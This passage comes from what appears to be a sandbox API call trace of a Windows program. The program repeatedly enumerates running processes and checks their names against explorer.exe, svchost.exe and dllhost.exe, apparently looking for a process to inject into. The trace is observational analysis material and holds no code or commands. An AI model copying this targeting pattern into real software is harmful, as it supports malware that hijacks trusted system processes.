paintings.exe", lpString2="svchost.exe") returned -1 [0192.235] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0192.235] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0192.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0192.235] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.235] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.235] CloseHandle (hObject=0xec) returned 1 [0192.235] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0192.235] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0192.236] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0192.236] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0192.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0192.236] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.236] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.236] CloseHandle (hObject=0xec) returned 1 [0192.236] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0192.236] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0192.236] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0192.236] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0192.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0192.237] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.237] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.237] CloseHandle (hObject=0xec) returned 1 [0192.237] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0192.237] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0192.237] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0192.237] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0192.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0192.238] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.238] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.238] CloseHandle (hObject=0xec) returned 1 [0192.238] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0192.238] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0192.238] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0192.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0192.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0192.238] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.238] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.238] CloseHandle (hObject=0xec) returned 1 [0192.238] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0192.238] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0192.238] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0192.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0192.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0192.239] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.239] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.239] CloseHandle (hObject=0xec) returned 1 [0192.239] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0192.239] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0192.239] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0192.239] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0192.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0192.240] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.240] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.240] CloseHandle (hObject=0xec) returned 1 [0192.240] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0192.240] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0192.240] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0192.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0192.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0192.240] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.240] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.240] CloseHandle (hObject=0xec) returned 1 [0192.240] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0192.241] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0192.241] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0192.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0192.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0192.241] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.241] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.241] CloseHandle (hObject=0xec) returned 1 [0192.241] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0192.241] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0192.241] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0192.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0192.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0192.242] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.242] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.242] CloseHandle (hObject=0xec) returned 1 [0192.242] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0192.242] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0192.242] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0192.242] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0192.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0192.242] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.243] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.243] CloseHandle (hObject=0xec) returned 1 [0192.243] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0192.243] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0192.243] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0192.243] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0192.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0192.243] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.243] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.243] CloseHandle (hObject=0xec) returned 1 [0192.243] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0192.243] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0192.243] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0192.243] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0192.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0192.244] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.244] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.244] CloseHandle (hObject=0xec) returned 1 [0192.244] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0192.244] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0192.244] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0192.244] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0192.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0192.245] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.245] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.245] CloseHandle (hObject=0xec) returned 1 [0192.245] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0192.245] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0192.245] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0192.245] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0192.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0192.245] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.245] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.245] CloseHandle (hObject=0xec) returned 1 [0192.245] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0192.245] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0192.245] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0192.246] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0192.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0192.246] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.246] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.246] CloseHandle (hObject=0xec) returned 1 [0192.246] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0192.246] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0192.246] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0192.246] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0192.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0192.247] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.247] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.247] CloseHandle (hObject=0xec) returned 1 [0192.247] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0192.247] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0192.247] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0192.247] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0192.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0192.247] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.247] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.248] CloseHandle (hObject=0xec) returned 1 [0192.248] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0192.248] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0192.248] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0192.248] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0192.248] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0192.249] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0192.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0192.249] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0192.250] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0192.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0192.250] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0192.251] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0192.251] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.251] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.251] CloseHandle (hObject=0xec) returned 1 [0192.251] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0192.252] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.252] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.252] CloseHandle (hObject=0xec) returned 1 [0192.252] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0192.252] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0192.253] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.253] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.253] CloseHandle (hObject=0xec) returned 1 [0192.253] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0192.253] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0192.253] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.253] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.254] CloseHandle (hObject=0xec) returned 1 [0192.254] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.254] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0192.255] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.255] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.255] CloseHandle (hObject=0xec) returned 1 [0192.255] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0192.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0192.255] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.255] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.255] CloseHandle (hObject=0xec) returned 1 [0192.255] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0192.255] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0192.255] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0192.255] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0192.256] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0192.256] CloseHandle (hObject=0xe8) returned 1 [0192.256] Sleep (dwMilliseconds=0x3e8) [0193.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0193.388] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0193.389] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0193.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0193.390] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0193.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0193.390] Process32Next 